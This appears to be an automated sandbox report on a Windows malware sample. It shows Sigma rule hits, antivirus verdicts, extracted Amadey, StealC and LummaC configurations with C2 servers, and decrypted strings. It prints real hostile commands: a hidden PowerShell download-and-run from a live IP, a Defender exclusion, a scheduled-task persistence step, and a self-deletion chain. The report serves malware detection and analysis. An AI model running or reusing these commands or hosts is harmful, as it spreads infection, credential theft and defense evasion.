                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe, ParentProcessId: 7948, ParentProcessName: cbfb8a9c89.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', ProcessId: 6180, ProcessName: powershell.exe
                                    Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 1988, ProcessName: schtasks.exe
                                    Sigma detected: Suspicious MSHTA Child Process
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    Sigma detected: Browser Started with Remote Debugging
                                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe", ParentImage: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe, ParentProcessId: 2656, ParentProcessName: DX0TGIT2LZWIIEDZ8Y3A15R.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7184, ProcessName: chrome.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7832, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f3d6f9fcfe.exe
                                    Sigma detected: PowerShell Download Pattern
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    Sigma detected: PowerShell Web Download
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe, ParentProcessId: 7948, ParentProcessName: cbfb8a9c89.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', ProcessId: 6180, ProcessName: powershell.exe
                                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe, ParentProcessId: 7948, ParentProcessName: cbfb8a9c89.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', ProcessId: 6180, ProcessName: powershell.exe
                                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1792, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 1476, ProcessName: powershell.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Powershell download and execute file
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe

                                    Suricata Signatures

                                    No Suricata rule has matched

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: EdYEXasNiR.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: https://lev-tolstoi.com:443/apiDHAvira URL Cloud: Label: malware
                                    Source: https://framekgirus.shop/alAvira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/(Avira URL Cloud: Label: malware
                                    Source: https://rapeflowwj.lat/fAvira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/3Avira URL Cloud: Label: malware
                                    Source: https://framekgirus.shop:443/apiAvira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/apiSAvira URL Cloud: Label: malware
                                    Source: https://framekgirus.shop/NAvira URL Cloud: Label: malware
                                    Source: https://framekgirus.shop/PAvira URL Cloud: Label: malware
                                    Source: https://framekgirus.shop/4Avira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/api$Avira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/((Avira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/api#Avira URL Cloud: Label: malware
                                    Source: https://energyaffai.lat/apiAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.206/c4becf79229cb002.phpAZAvira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/apibvAvira URL Cloud: Label: malware
                                    Source: https://lev-tolstoi.com:443/apiCGAvira URL Cloud: Label: malware
                                    Source: https://lev-tolstoi.com/apilgAvira URL Cloud: Label: malware
                                    Source: https://framekgirus.shop/#Avira URL Cloud: Label: malware
                                    Source: http://185.215.113.43/Zu7JuNko/index.php7Avira URL Cloud: Label: malware
                                    Source: https://lev-tolstoi.com/oNAvira URL Cloud: Label: malware
                                    Source: http://185.215.113.43/Zu7JuNko/index.phpncodedSAvira URL Cloud: Label: malware
                                    Source: https://rapeflowwj.lat/zAvira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/HAvira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/XAvira URL Cloud: Label: malware
                                    Source: https://pancakedipyps.click/EAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                                    Found malware configuration
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
                                    Source: EdYEXasNiR.exe.6464.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "framekgirus.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "fancywaxxers.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "PsFKDg--pablo"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeReversingLabs: Detection: 56%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exeReversingLabs: Detection: 95%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exeReversingLabs: Detection: 30%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exeReversingLabs: Detection: 47%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[5].exeReversingLabs: Detection: 95%
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeReversingLabs: Detection: 56%
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeReversingLabs: Detection: 30%
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeReversingLabs: Detection: 95%
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeReversingLabs: Detection: 47%
                                    Source: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exeReversingLabs: Detection: 95%
                                    Multi AV Scanner detection for submitted file
                                    Source: EdYEXasNiR.exeVirustotal: Detection: 56%Perma Link
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: EdYEXasNiR.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: 185.215.113.43
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: /Zu7JuNko/index.php
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: S-%lu-
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: abc3bc1985
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: skotes.exe
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Startup
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: cmd /C RMDIR /s/q
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: rundll32
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Programs
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: %USERPROFILE%
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: cred.dll|clip.dll|
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: cred.dll
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: clip.dll
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: http://
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: https://
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: /quiet
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: /Plugins/
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: &unit=
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: shell32.dll
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: kernel32.dll
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: GetNativeSystemInfo
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: ProgramData\
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: AVAST Software
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Kaspersky Lab
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Panda Security
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Doctor Web
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: 360TotalSecurity
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Bitdefender
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Norton
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Sophos
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Comodo
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: WinDefender
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: 0123456789
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: ------
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: ?scr=1
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: ComputerName
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: -unicode-
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: VideoID
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: DefaultSettings.XResolution
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: DefaultSettings.YResolution
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: ProductName
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: CurrentBuild
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: rundll32.exe
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: "taskkill /f /im "
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: " && timeout 1 && del
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: && Exit"
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: " && ren
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: Powershell.exe
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: -executionpolicy remotesigned -File "
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: shutdown -s -t 0
